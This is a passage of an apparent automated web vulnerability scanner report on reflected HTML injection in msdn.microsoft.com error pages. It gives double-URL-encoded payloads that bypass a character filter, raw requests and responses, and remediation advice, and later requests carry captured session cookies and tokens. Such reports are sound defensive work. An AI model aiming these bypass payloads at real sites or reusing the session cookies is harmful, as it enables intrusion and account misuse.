<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library653a0"><a>b3def3ef286/dd208104(PROT.10)" />
...[SNIP]...

2.45. http://msdn.microsoft.com/en-us/library/dd208104(PROT.10).aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd208104(PROT.10).aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32d6f%2522%253e%253ca%253e13799d99661 was submitted in the REST URL parameter 3. This input was echoed as 32d6f"><a>13799d99661 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/dd208104(PROT.10).aspx32d6f%2522%253e%253ca%253e13799d99661 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9227
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd208104(PROT.10).aspx32d6f"><a>13799d99661" />
...[SNIP]...

2.46. http://msdn.microsoft.com/en-us/library/dd582937(office.11 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582937(office.11

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e81ea%2522%253e%253ca%253e6a2a9f3482d was submitted in the REST URL parameter 1. This input was echoed as e81ea"><a>6a2a9f3482d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-use81ea%2522%253e%253ca%253e6a2a9f3482d/library/dd582937(office.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-use81ea"><a>6a2a9f3482d/library/dd582937(office.11" />
...[SNIP]...

2.47. http://msdn.microsoft.com/en-us/library/dd582937(office.11 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582937(office.11

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74342%2522%253e%253ca%253eb95c098f3cf was submitted in the REST URL parameter 2. This input was echoed as 74342"><a>b95c098f3cf in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library74342%2522%253e%253ca%253eb95c098f3cf/dd582937(office.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library74342"><a>b95c098f3cf/dd582937(office.11" />
...[SNIP]...

2.48. http://msdn.microsoft.com/en-us/library/dd582937(office.11 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582937(office.11

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1cf4%2522%253e%253ca%253ea00ac7dd75a was submitted in the REST URL parameter 3. This input was echoed as f1cf4"><a>a00ac7dd75a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/dd582937(office.11f1cf4%2522%253e%253ca%253ea00ac7dd75a HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582937(office.11f1cf4"><a>a00ac7dd75a" />
...[SNIP]...

2.49. http://msdn.microsoft.com/en-us/library/dd582937(office.11).aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582937(office.11).aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46aa7%2522%253e%253ca%253e2b28de78233 was submitted in the REST URL parameter 1. This input was echoed as 46aa7"><a>2b28de78233 in the application's response. The reflection point is the aspxerrorpath value that the error page /en-us/Message-Error.htm.htm writes, unencoded, into the value attribute of its hidden fromPage input: the double quote closes that attribute and the <a> that follows is rendered as a new tag.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Independently of that, the value should be HTML-attribute-encoded when it is written into the value attribute of the hidden fromPage input, so that a double quote in the path cannot close the attribute even if the character filter is bypassed.

Request

GET /en-us46aa7%2522%253e%253ca%253e2b28de78233/library/dd582937(office.11).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; 
ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9221
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us46aa7"><a>2b28de78233/library/dd582937(office.11)" />
...[SNIP]...

2.50. http://msdn.microsoft.com/en-us/library/dd582937(office.11).aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582937(office.11).aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ad5e%2522%253e%253ca%253e9e2edfb91df was submitted in the REST URL parameter 2. This input was echoed as 9ad5e"><a>9e2edfb91df in the application's response. The reflection point is the aspxerrorpath value that the error page /en-us/Message-Error.htm.htm writes, unencoded, into the value attribute of its hidden fromPage input: the double quote closes that attribute and the <a> that follows is rendered as a new tag.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Independently of that, the value should be HTML-attribute-encoded when it is written into the value attribute of the hidden fromPage input, so that a double quote in the path cannot close the attribute even if the character filter is bypassed.

Request

GET /en-us/library9ad5e%2522%253e%253ca%253e9e2edfb91df/dd582937(office.11).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9221
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library9ad5e"><a>9e2edfb91df/dd582937(office.11)" />
...[SNIP]...

2.51. http://msdn.microsoft.com/en-us/library/dd582937(office.11).aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582937(office.11).aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58dea%2522%253e%253ca%253e93ab1411cb5 was submitted in the REST URL parameter 3. This input was echoed as 58dea"><a>93ab1411cb5 in the application's response. The reflection point is the aspxerrorpath value that the error page /en-us/Message-Error.htm.htm writes, unencoded, into the value attribute of its hidden fromPage input: the double quote closes that attribute and the <a> that follows is rendered as a new tag.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Independently of that, the value should be HTML-attribute-encoded when it is written into the value attribute of the hidden fromPage input, so that a double quote in the path cannot close the attribute even if the character filter is bypassed.

Request

GET /en-us/library/dd582937(office.11).aspx58dea%2522%253e%253ca%253e93ab1411cb5 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9232
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582937(office.11).aspx58dea"><a>93ab1411cb5" />
...[SNIP]...

2.52. http://msdn.microsoft.com/en-us/library/dd582938(office.11 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(office.11

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4846e%2522%253e%253ca%253ed113f5f9538 was submitted in the REST URL parameter 1. This input was echoed as 4846e"><a>d113f5f9538 in the application's response. The reflection point is the aspxerrorpath value that the error page /en-us/Message-Error.htm.htm writes, unencoded, into the value attribute of its hidden fromPage input: the double quote closes that attribute and the <a> that follows is rendered as a new tag.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Independently of that, the value should be HTML-attribute-encoded when it is written into the value attribute of the hidden fromPage input, so that a double quote in the path cannot close the attribute even if the character filter is bypassed.

Request

GET /en-us4846e%2522%253e%253ca%253ed113f5f9538/library/dd582938(office.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; 